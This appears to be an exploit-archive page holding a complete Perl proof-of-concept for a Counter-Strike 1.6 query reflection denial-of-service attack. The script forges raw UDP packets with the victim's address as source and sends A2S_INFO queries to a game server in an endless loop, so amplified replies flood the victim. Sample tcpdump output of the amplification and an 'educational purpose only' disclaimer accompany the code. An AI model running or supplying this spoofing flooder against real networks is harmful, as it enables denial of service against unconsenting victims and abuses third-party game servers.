Counter Strike 1.6 Query Reflection DoS

1. #!/usr/bin/perl
2. #
3. #  Counter-Strike 1.6 'GameInfo' Query Reflection DoS
4. #  Proof Of Concept
5. #
6. #  Copyright 2015 (c) Todor Donev
7. #  todor.donev@gmail.com<script cf-hash="f9e31" type="text/javascript">
8. /* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */</script>
9. #  http://www.ethical-hacker.org/
10. #  https://www.facebook.com/ethicalhackerorg
11. #  http://pastebin.com/u/hackerscommunity
12. #
13. #
14. #  Disclaimer:
15. #  This or previous program is for Educational
16. #  purpose ONLY. Do not use it without permission.
17. #  The usual disclaimer applies, especially the
18. #  fact that Todor Donev is not liable for any
19. #  damages caused by direct or indirect use of the
20. #  information or functionality provided by these
21. #  programs. The author or any Internet provider
22. #  bears NO responsibility for content or misuse
23. #  of these programs or any derivatives thereof.
24. #  By using these programs you accept the fact
25. #  that any damage (dataloss, system crash,
26. #  system compromise, etc.) caused by the use
27. #  of these programs is not Todor Donev's
28. #  responsibility.
29. #
30. #  Use at your own risk and educational
31. #  purpose ONLY!
32. #
33. #  See also, UDP-based Amplification Attacks:
34. #  https://www.us-cert.gov/ncas/alerts/TA14-017A
35. #
36. #  # perl cstrike-drdos-poc.pl 46.165.194.16 192.168.1.10 27010
37. #  [ Counter-Strike 1.6 'GameInfo' query reflection dos poc
38. #  [ Sending GameInfo requests: 46.165.194.16 -> 192.168.1.10  
39. #  ^C
40. #
41. #  # tcpdump -i eth0 -c4 port 27010
42. #  tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
43. #  listening on eth0, link-type EN10MB (Ethernet), capture size 65535 bytes
44. #  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
45. #  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
46. #  00:00:00.000000 IP 192.168.1.10.31337 > masterserver.css.setti.info.27010: UDP, length 25
47. #  00:00:00.000000 IP masterserver.css.setti.info.27010 > 192.168.1.10.31337: UDP, length 1392
48. #  4 packets captured
49. #  4 packets received by filter
50. #  0 packets dropped by kernel
51.  
52.  
53. use strict;
54. use Socket;
55. use warnings;
56. no warnings 'uninitialized';
57.  
58. print "[ Counter-Strike 1.6 \'GameInfo\' query reflection dos poc\n";
59. die "[ Sorry, must be run as root. This script use RAW Socket.\n" if ($< != 0);
60. my $css         = (gethostbyname($ARGV[0]))[4];         # IP Address Destination        (32 bits)
61. my $victim      = (gethostbyname($ARGV[1]))[4];         # IP Address Source             (32 bits)
62. my $port        = $ARGV[2] || '27015';                  # Int between 1 and 65535        Default: 27015
63. die "[ Port must be between 1 and 65535!\n" if ($port < 1 || $port > 65535);
64. if (!defined $css || !defined $victim) {
65.     print "[ Usg: $0 <cstrike server> <victim> <port>\n";
66.     print "[ Default port: 27015\n";
67.     print "[ <todor.donev\@gmail.com> Todor Donev\n";
68.     exit;
69. }
70.  
71. print "[ Sending GameInfo requests: $ARGV[0] -> $ARGV[1]\n";
72. socket(RAW, AF_INET, SOCK_RAW, 255)             || die $!;
73. setsockopt(RAW, 0, 1, 1)                        || die $!;
74. main();
75.  
76.     # Main program
77. sub main {
78.     my $packet;
79.      
80.     $packet = iphdr();
81.     $packet .= udphdr();
82.     $packet .= cshdr();
83.     # b000000m...
84.     send_packet($packet);
85. }
86.  
87.     # IP header (Layer 3)
88. sub iphdr {
89.     my $ip_ver          = 4;                                    # IP Version 4                  (4 bits)
90.     my $iphdr_len       = 5;                                    # IP Header Length              (4 bits)
91.     my $ip_tos          = 0;                                    # Differentiated Services       (8 bits)
92.     my $ip_total_len    = $iphdr_len + 20;                      # IP Header Length + Data      (16 bits)
93.     my $ip_frag_id      = 0;                                    # Identification Field         (16 bits)
94.     my $ip_frag_flag    = 000;                                  # IP Frag Flags (R DF MF)       (3 bits)
95.     my $ip_frag_offset  = 0000000000000;                        # IP Fragment Offset           (13 bits)
96.     my $ip_ttl          = 255;                                  # IP TTL                        (8 bits)
97.     my $ip_proto        = 17;                                   # IP Protocol                   (8 bits)
98.     my $ip_checksum     = 0;                                    # IP Checksum                  (16 bits)
99.  
100.     # IP Packet
101.         my $iphdr       = pack(
102.                         'H2 H2 n n B16 h2 c n a4 a4',
103.                         $ip_ver . $iphdr_len, $ip_tos,
104.                         $ip_total_len, $ip_frag_id,
105.                         $ip_frag_flag . $ip_frag_offset,
106.                         $ip_ttl, $ip_proto, $ip_checksum,
107.                         $victim, $css
108.                         );
109.                         return $iphdr;
110. }
111.  
112.     # UDP Header (Layer 4)
113. sub udphdr {
114.     my $udp_src_port    = 31337;                        # UDP Sort Port         (16 bits) (0-65535)
115.     my $udp_dst_port    = $port;                        # UDP Dest Port         (16 btis) (0-65535)
116.     my $udp_len         = 8 + length(cshdr());          # UDP Length            (16 bits) (0-65535)
117.     my $udp_checksum    = 0;                            # UDP Checksum          (16 bits) (XOR of header)
118.  
119.     # UDP Packet
120.     my $udphdr          = pack(
121.                         'n n n n',
122.                         $udp_src_port,
123.                         $udp_dst_port,
124.                         $udp_len,
125.                         $udp_checksum
126.                         );
127.         return $udphdr;
128. }
129.  
130.    # Counter-Strike 'GameInfo' request
131. sub cshdr {
132.  
133. #
134. # https://developer.valvesoftware.com/wiki/Server_queries
135. #
136. # https://developer.valvesoftware.com/wiki/Source_RCON_Protocol
137. # Requests
138. # The server responds to 5 queries:
139. #
140. #          A2S_INFO   'T' (0x54)
141. #    Basic information about the server.
142. #          A2S_PLAYER 'U' (0x55)  
143. #    Details about each player on the server.
144. #          A2S_RULES  'V' (0x56)
145. #    The rules the server is using.
146. #          A2A_PING   'i' (0x69)
147. #    Ping the server. (DEPRECATED)
148. # A2S_SERVERQUERY_GETCHALLENGE  'W' (0x57)
149. #    Returns a challenge number for use in the player and rules query. (DEPRECATED)
150. #
151. # Queries should be sent in UDP packets to the listen port of the server.
152. #
153.  
154. # 25 bytes - A2S_INFO
155.     my $query            = "\xff\xff\xff\xff\x54";      # 0000   ff ff ff ff 54 53 6f 75 72 63 65 20 45 6e 67 69  ....TSource Engi
156.        $query           .= "\x53\x6f\x75\x72\x63";      # 0010   6e 65 20 51 75 65 72 79 00                       ne Query.
157.        $query           .= "\x65\x20\x45\x6e\x67";      
158.        $query           .= "\x69\x6e\x65\x20\x51";      
159.        $query           .= "\x75\x65\x72\x79\x00";      
160.  
161.     my $cshdr            = pack('a*', $query);
162. return $cshdr;
163. }
164.  
165. sub send_packet {
166.     while(1){
167.     select(undef, undef, undef, 0.40);                  # Sleep 400 milliseconds
168.     send(RAW, $_[0], 0, pack('Sna4x8', AF_INET, 60, $css))  || die $!;
169.    }
170. }